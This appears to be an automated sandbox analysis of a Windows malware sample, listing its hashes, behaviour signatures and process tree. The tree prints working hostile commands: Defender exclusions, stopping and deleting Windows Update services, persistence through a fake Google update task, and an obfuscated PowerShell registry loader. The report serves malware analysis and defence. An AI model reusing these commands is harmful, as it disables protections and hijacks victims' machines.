Resubmissions

04-09-2023 00:32

230904-avy45scf7x 10

03-09-2023 22:32

230903-2f6n8acd91 10

Analysis

  • max time kernel
    300s
  • max time network
    291s
  • platform
    windows10-1703_x64
  • resource
    win10-20230831-en
  • resource tags

    arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04-09-2023 00:32

General

  • Target

    dmi1dfg7n.exe

  • Size

    2.8MB

  • MD5

    9253ed091d81e076a3037e12af3dc871

  • SHA1

    ec02829a25b3bf57ad061bbe54180d0c99c76981

  • SHA256

    78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

  • SHA512

    29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

  • SSDEEP

    49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 26 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 26 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:644
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:592
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
          • Suspicious use of FindShellTrayWindow
          PID:988
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6f8d7705-1b8e-42e2-93fc-f3b561263e8f}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2356
        • C:\Windows\SysWOW64\dllhost.exe
          C:\Windows\SysWOW64\dllhost.exe /Processid:{d3239665-971c-43db-b93c-f0842792cfa9}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4104
        • C:\Windows\explorer.exe
          explorer.exe
          2⤵
          • Modifies Installed Components in the registry
          • Enumerates connected drives
          • Drops file in Windows directory
          • Checks SCSI registry key(s)
          • Modifies registry class
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:4504
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
        1⤵
          PID:904
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
          1⤵
            PID:68
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
            1⤵
              PID:412
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
              1⤵
                PID:640
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
                1⤵
                  PID:744
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                    PID:856
                    • c:\windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2980
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:4276
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4240
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:5108
                        • C:\Program Files\Google\Chrome\updater.exe
                          "C:\Program Files\Google\Chrome\updater.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          PID:2560
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                            3⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            PID:2112
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              4⤵
                                PID:2956
                            • C:\Windows\system32\cmd.exe
                              cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              3⤵
                                PID:4444
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  4⤵
                                    PID:3916
                                  • C:\Windows\system32\sc.exe
                                    sc stop UsoSvc
                                    4⤵
                                    • Launches sc.exe
                                    PID:3568
                                  • C:\Windows\system32\sc.exe
                                    sc stop WaaSMedicSvc
                                    4⤵
                                    • Launches sc.exe
                                    PID:4836
                                  • C:\Windows\system32\sc.exe
                                    sc stop wuauserv
                                    4⤵
                                    • Launches sc.exe
                                    PID:4404
                                  • C:\Windows\system32\sc.exe
                                    sc stop bits
                                    4⤵
                                    • Launches sc.exe
                                    PID:3300
                                  • C:\Windows\system32\sc.exe
                                    sc stop dosvc
                                    4⤵
                                    • Launches sc.exe
                                    PID:4316
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                    4⤵
                                      PID:3880
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                      4⤵
                                        PID:4312
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                        4⤵
                                          PID:1196
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 1196 -s 276
                                            5⤵
                                            • Program crash
                                            PID:4316
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                          4⤵
                                            PID:4336
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                            4⤵
                                              PID:1028
                                          • C:\Windows\system32\cmd.exe
                                            cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                            3⤵
                                              PID:3724
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:3708
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  4⤵
                                                    PID:1776
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-dc 0
                                                    4⤵
                                                      PID:3484
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -standby-timeout-ac 0
                                                      4⤵
                                                        PID:3848
                                                      • C:\Windows\system32\powercfg.exe
                                                        powercfg /x -standby-timeout-dc 0
                                                        4⤵
                                                          PID:3440
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                        3⤵
                                                        • Drops file in System32 directory
                                                        • Modifies data under HKEY_USERS
                                                        PID:3296
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          4⤵
                                                            PID:4688
                                                          • C:\Windows\system32\wermgr.exe
                                                            "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3296" "2264" "2412" "2284" "0" "0" "2260" "0" "0" "0" "0" "0"
                                                            4⤵
                                                              PID:756
                                                          • C:\Windows\system32\dialer.exe
                                                            C:\Windows\system32\dialer.exe xtrjicqmdliu
                                                            3⤵
                                                              PID:2956
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                                4⤵
                                                                • Drops file in Program Files directory
                                                                PID:3552
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  5⤵
                                                                    PID:3576
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                                3⤵
                                                                • Drops file in Program Files directory
                                                                PID:792
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  4⤵
                                                                    PID:3636
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic PATH Win32_VideoController GET Name, VideoProcessor
                                                                    4⤵
                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                    • Checks system information in the registry
                                                                    • Detects videocard installed
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:4316
                                                                • C:\Windows\system32\dialer.exe
                                                                  C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
                                                                  3⤵
                                                                    PID:3276
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                PID:1148
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                1⤵
                                                                  PID:1096
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                                                  1⤵
                                                                    PID:1188
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k localservice -s nsi
                                                                    1⤵
                                                                      PID:1292
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                      1⤵
                                                                        PID:1204
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                        1⤵
                                                                          PID:1344
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                                                          1⤵
                                                                            PID:1408
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                            1⤵
                                                                              PID:1352
                                                                              • c:\windows\system32\sihost.exe
                                                                                sihost.exe
                                                                                2⤵
                                                                                • Modifies registry class
                                                                                PID:2812
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                                                              1⤵
                                                                                PID:1456
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                                                                1⤵
                                                                                  PID:1524
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                                                                  1⤵
                                                                                    PID:1560
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                                                    1⤵
                                                                                      PID:1604
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                                                      1⤵
                                                                                        PID:1712
                                                                                      • C:\Windows\System32\svchost.exe
                                                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                                                        1⤵
                                                                                          PID:1724
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                                                          1⤵
                                                                                            PID:1732
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                                                            1⤵
                                                                                              PID:1744
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                              1⤵
                                                                                                PID:1880
                                                                                              • C:\Windows\System32\spoolsv.exe
                                                                                                C:\Windows\System32\spoolsv.exe
                                                                                                1⤵
                                                                                                  PID:1952
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                                                                  1⤵
                                                                                                    PID:2028
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                                                    1⤵
                                                                                                      PID:2212
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                      1⤵
                                                                                                        PID:2264
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                                                        1⤵
                                                                                                          PID:2272
                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                          1⤵
                                                                                                          • Enumerates connected drives
                                                                                                          PID:2292
                                                                                                        • C:\Windows\sysmon.exe
                                                                                                          C:\Windows\sysmon.exe
                                                                                                          1⤵
                                                                                                            PID:2376
                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                                                            1⤵
                                                                                                              PID:2332
                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                                                              1⤵
                                                                                                                PID:2400
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                1⤵
                                                                                                                  PID:2416
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                  1⤵
                                                                                                                    PID:2428
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                    1⤵
                                                                                                                      PID:2740
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                                                      1⤵
                                                                                                                        PID:2876
                                                                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:3008
                                                                                                                        • C:\Windows\Explorer.EXE
                                                                                                                          C:\Windows\Explorer.EXE
                                                                                                                          1⤵
                                                                                                                            PID:3196
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:4864
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                3⤵
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:3912
                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                3⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1028
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop UsoSvc
                                                                                                                                  4⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:3368
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop WaaSMedicSvc
                                                                                                                                  4⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:3684
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop wuauserv
                                                                                                                                  4⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:4780
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop bits
                                                                                                                                  4⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:4640
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop dosvc
                                                                                                                                  4⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:1284
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                                  4⤵
                                                                                                                                    PID:304
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                    4⤵
                                                                                                                                      PID:3772
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                      4⤵
                                                                                                                                      • Modifies security service
                                                                                                                                      PID:2368
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                      4⤵
                                                                                                                                        PID:4460
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                        4⤵
                                                                                                                                          PID:384
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:164
                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:4772
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          powercfg /x -hibernate-timeout-ac 0
                                                                                                                                          4⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3356
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          powercfg /x -hibernate-timeout-dc 0
                                                                                                                                          4⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3780
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          powercfg /x -standby-timeout-dc 0
                                                                                                                                          4⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1720
                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                          powercfg /x -standby-timeout-ac 0
                                                                                                                                          4⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1268
                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                        3⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        PID:2804
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:5112
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                                                                                                                          4⤵
                                                                                                                                            PID:4228
                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 3196 -s 2896
                                                                                                                                        2⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:1336
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                                                      1⤵
                                                                                                                                        PID:3520
                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of UnmapMainImage
                                                                                                                                        PID:3736
                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                        1⤵
                                                                                                                                          PID:3948
                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 3948 -s 888
                                                                                                                                            2⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:4160
                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4572
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                                                            1⤵
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:4332
